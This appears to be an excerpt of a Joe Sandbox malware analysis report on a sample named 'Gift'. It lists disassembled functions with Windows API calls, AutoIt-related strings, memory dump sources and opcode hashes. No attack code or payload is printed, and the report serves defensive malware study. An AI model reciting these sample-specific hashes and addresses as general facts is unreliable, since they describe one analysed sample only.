                                                                          Function 002F0FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F593C: __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002F593C: __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002F593C: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          • std::exception::exception.LIBCMT ref: 002F101C
                                                                          • __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                            • Part of subcall function 002F87CB: RaiseException.KERNEL32(?,?,?,0038CAF8,?,?,?,?,?,002F1036,?,0038CAF8,?,00000001), ref: 002F8820
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID: `=6$h=6
                                                                          • API String ID: 3902256705-1285141784
                                                                          • Opcode ID: 48b086cf168cb89c0360b7e551b79aaea6e05786c0171b2d4e0d5e0db83910ce
                                                                          • Instruction ID: 0910fd69adbd0e2b8b35e03d5a2905fe887c28f43e4656704e7e1da944d8600a
                                                                          • Opcode Fuzzy Hash: 48b086cf168cb89c0360b7e551b79aaea6e05786c0171b2d4e0d5e0db83910ce
                                                                          • Instruction Fuzzy Hash: FEF0D63956421EA2CB21BA58D8019FEF79C9F02390F504079FF0492681DFB08A708AA0
                                                                          Function 002E5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5B58
                                                                            • Part of subcall function 002E56F8: _memset.LIBCMT ref: 002E5787
                                                                            • Part of subcall function 002E56F8: _wcscpy.LIBCMT ref: 002E57DB
                                                                            • Part of subcall function 002E56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002E57EB
                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 002E5BAD
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E5BBC
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00320D7C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1378193009-0
                                                                          • Opcode ID: bf37f00e0ddf06eac00f27cfc8dd053e79a9495c46b7df48676bd43916d1e872
                                                                          • Instruction ID: 1c01589627e22e8c57878ec66e98bc84ff4ca62021610280bb52f538a296f52f
                                                                          • Opcode Fuzzy Hash: bf37f00e0ddf06eac00f27cfc8dd053e79a9495c46b7df48676bd43916d1e872
                                                                          • Instruction Fuzzy Hash: 752149705557E49FEB738B34D885BEBBBECAF0130CF00048DE68A56182C3702989CB51
                                                                          Function 002E278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002E27AF,?,00000001), ref: 002E49F4
                                                                          • _free.LIBCMT ref: 0031FB04
                                                                          • _free.LIBCMT ref: 0031FB4B
                                                                            • Part of subcall function 002E29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002E2ADF
                                                                          Strings
                                                                          • Bad directive syntax error, xrefs: 0031FB33
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: Bad directive syntax error
                                                                          • API String ID: 2861923089-2118420937
                                                                          • Opcode ID: d40f80364820ac33f8bb2ea322834d7d01354d0ed28329ff56b0afc2104a1d9b
                                                                          • Instruction ID: 40467d00a76250cf222b34231fc10a7c7fa4239afdca673f5a17b006cde6c5f9
                                                                          • Opcode Fuzzy Hash: d40f80364820ac33f8bb2ea322834d7d01354d0ed28329ff56b0afc2104a1d9b
                                                                          • Instruction Fuzzy Hash: 88918D71910259EFCF09EFA5C8919EEB7B8BF09310F50453AF816AB2A1DB309954CF50
                                                                          Function 002E48B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: AU3! ?6$EA06
                                                                          • API String ID: 4104443479-1139135814
                                                                          • Opcode ID: e176d47bf98dbe6d698d422cf06a1739bdf577a56d97df6dfecd1d9f6a5cc2e4
                                                                          • Instruction ID: ddc7bfb9dc84c316e4ebe54051213d5433774131c866c1dd5029873e07e6c85a
                                                                          • Opcode Fuzzy Hash: e176d47bf98dbe6d698d422cf06a1739bdf577a56d97df6dfecd1d9f6a5cc2e4
                                                                          • Instruction Fuzzy Hash: AA41AF31A641E85BDF22AB6588517BF7FA18B45310FE540B5E881FB283C6708D6487E1
                                                                          Function 00339CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E4AB2: __fread_nolock.LIBCMT ref: 002E4AD0
                                                                          • _wcscmp.LIBCMT ref: 00339DE1
                                                                          • _wcscmp.LIBCMT ref: 00339DF4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 16865aaee01ae360542d086b07bec4661277731a959db96fbbf1d7e4a902b2e2
                                                                          • Instruction ID: 3c10c20bbc70bae772627394e9c7cc63de3df90cf97cc23b63bf91b44f590caa
                                                                          • Opcode Fuzzy Hash: 16865aaee01ae360542d086b07bec4661277731a959db96fbbf1d7e4a902b2e2
                                                                          • Instruction Fuzzy Hash: 5341F971A40209BADF21EAA5CC96FEFB7BDDF45710F01447AFA00A7280D6B199548B64
                                                                          Function 002E31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0032032B
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00320375
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 002F09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002F09E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
                                                                          • Opcode ID: adf264f8c1a5085f3b239f723f27385c1f77233bf98f5bdb94954982d101278b
                                                                          • Instruction ID: eef9d568d1fd83d09fadc0d5202fb665da291f5994a676cae31d6e3420d5ad80
                                                                          • Opcode Fuzzy Hash: adf264f8c1a5085f3b239f723f27385c1f77233bf98f5bdb94954982d101278b
                                                                          • Instruction Fuzzy Hash: 0321C371A202989BDF06DF94D845BEEBBFC9F49300F00405AE508A7241DBF55A9CCFA1
                                                                          Function 0034D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 46246608daa0d42b4d8a7dea422632efdcfa2667946ed935db22b87287fc4340
                                                                          • Instruction ID: 2873ed66a5351242ab0b593d0699a33a482e8af72108e9d92648ed658f7fa144
                                                                          • Opcode Fuzzy Hash: 46246608daa0d42b4d8a7dea422632efdcfa2667946ed935db22b87287fc4340
                                                                          • Instruction Fuzzy Hash: EFF147B0A083009FC715DF28C484A6ABBE5FF89314F55892EF8999B351DB70E945CF82
                                                                          Function 002E1680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: ef247a5bfc9404fe3f06181743d4d8609ae2d7e41b9b4e649c6bbb8b04cecc7f
                                                                          • Instruction ID: e9946f5a02e364c4c54d948125254f46664baa59c2aa17a956b536649f5890fa
                                                                          • Opcode Fuzzy Hash: ef247a5bfc9404fe3f06181743d4d8609ae2d7e41b9b4e649c6bbb8b04cecc7f
                                                                          • Instruction Fuzzy Hash: 4161D071620209DBDF048F2AD8806AABBB9FF44350F9485B9EC19CF295EB35D970CB50
                                                                          Function 002E59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E59F9
                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E5A9E
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5ABB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$_memset
                                                                          • String ID:
                                                                          • API String ID: 1505330794-0
                                                                          • Opcode ID: 95e7162f5fdee275e0a49174c64b5393c61035a4ba860ea56b0b25a8528da032
                                                                          • Instruction ID: 17a747d2c332ade63051cade85bc47a64e71c75c52f1521758f2fd92be76b651
                                                                          • Opcode Fuzzy Hash: 95e7162f5fdee275e0a49174c64b5393c61035a4ba860ea56b0b25a8528da032
                                                                          • Instruction Fuzzy Hash: 6431A0B05357518FD721DF25D884697BBE8FB48308F400E3EF59A82281E7716954CB92
                                                                          Function 002F593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002FA39B: __NMSG_WRITE.LIBCMT ref: 002FA3C2
                                                                            • Part of subcall function 002FA39B: __NMSG_WRITE.LIBCMT ref: 002FA3CC
                                                                          • __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002FA3F8: GetModuleFileNameW.KERNEL32(00000000,003953BA,00000104,00000004,00000001,002F1003), ref: 002FA48A
                                                                            • Part of subcall function 002FA3F8: ___crtMessageBoxW.LIBCMT ref: 002FA538
                                                                            • Part of subcall function 002F32CF: ___crtCorExitProcess.LIBCMT ref: 002F32D5
                                                                            • Part of subcall function 002F32CF: ExitProcess.KERNEL32 ref: 002F32DE
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1372826849-0
                                                                          • Opcode ID: fd133f2978df89e888e22a77d703eaee6c79da73347be969e82d8ae335db23f9
                                                                          • Instruction ID: 08049371771fa476f505db1ac9e58b7b685c95dae1298565a0388992bb5db79d
                                                                          • Opcode Fuzzy Hash: fd133f2978df89e888e22a77d703eaee6c79da73347be969e82d8ae335db23f9
                                                                          • Instruction Fuzzy Hash: F001D632331B2FDAE61A6B34AC0263EF2489F427F0F500436F7159A291DEF08D604BA1
                                                                          Function 003392C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 003392D6
                                                                            • Part of subcall function 002F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2F99
                                                                            • Part of subcall function 002F2F85: GetLastError.KERNEL32(00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2FAB
                                                                          • _free.LIBCMT ref: 003392E7
                                                                          • _free.LIBCMT ref: 003392F9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                          • Instruction ID: 98de821e262c3a0308486d8dffd80f561dd9d032b4e55193189e940b010d543c
                                                                          • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                          • Instruction Fuzzy Hash: F6E0C2A1624A06D7CA20A5386880FE3B7EC0F88391B260A2EB509D3542CE60E8408528
                                                                          Function 002D5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CALL
                                                                          • API String ID: 0-4196123274
                                                                          • Opcode ID: f4ed37f26e24997472eb2d3de92a7c097831a2c6d59f250166005f75d9674b82
                                                                          • Instruction ID: 26b05b5b43a0a1c4519ea518d7599c55f5f17ae9232177c1d81cf693fdfafa70
                                                                          • Opcode Fuzzy Hash: f4ed37f26e24997472eb2d3de92a7c097831a2c6d59f250166005f75d9674b82
                                                                          • Instruction Fuzzy Hash: F4328B74628352DFC725DF14C494A2AB7E1BF85304F15896EF88A8B362C771EC65CB82
                                                                          Function 0034E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _strcat.LIBCMT ref: 0034E20C
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • _wcscpy.LIBCMT ref: 0034E29B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1012013722-0
                                                                          • Opcode ID: 61c7baa22af269f9b637d439d4f9804230f9b3d454ca5950a787c6faf078ba9b
                                                                          • Instruction ID: 97403cf5eac0c21378509759138f12395596f62cde560ce304937c6ae036da0b
                                                                          • Opcode Fuzzy Hash: 61c7baa22af269f9b637d439d4f9804230f9b3d454ca5950a787c6faf078ba9b
                                                                          • Instruction Fuzzy Hash: 6E913939A10614DFCB1AEF18C5819A9B7E5FF59310B5580AAE84A8F762DB30FD51CF80
                                                                          Function 00336818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memmove.LIBCMT ref: 003368EC
                                                                          • _memmove.LIBCMT ref: 0033690A
                                                                            • Part of subcall function 00336A73: _memmove.LIBCMT ref: 00336B01
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                          • Instruction ID: 656f393a9029144594ff872be6b303278110b4488c2f353d6141b60174b0bc7d
                                                                          • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                          • Instruction Fuzzy Hash: 3371B3B0200604AFCB26AF14C8C6B6ABBB5EF84324F25C51DECD52B792CB75AD51CB50
                                                                          Function 00336135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0033614E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower
                                                                          • String ID:
                                                                          • API String ID: 2358735015-0
                                                                          • Opcode ID: c914bec243eed725e10fe0a5988e0aa463466b3b32df53fd076291a023babe2d
                                                                          • Instruction ID: 2de34414ed46460c6be434507be11d3b96637a0e10811316f8c3916b348696bd
                                                                          • Opcode Fuzzy Hash: c914bec243eed725e10fe0a5988e0aa463466b3b32df53fd076291a023babe2d
                                                                          • Instruction Fuzzy Hash: 65418576900209AFDB22DF64C8C29AFB7BCEB44350F15863EE516D7251EB709A54CB50
                                                                          Function 002F0E38 Relevance: 3.1, APIs: 2, Instructions: 94libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindCloseChangeNotification.KERNEL32 ref: 002F0ED5
                                                                          • LoadLibraryExW.KERNELBASE ref: 002F0EE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseFindLibraryLoadNotification
                                                                          • String ID:
                                                                          • API String ID: 1525634188-0
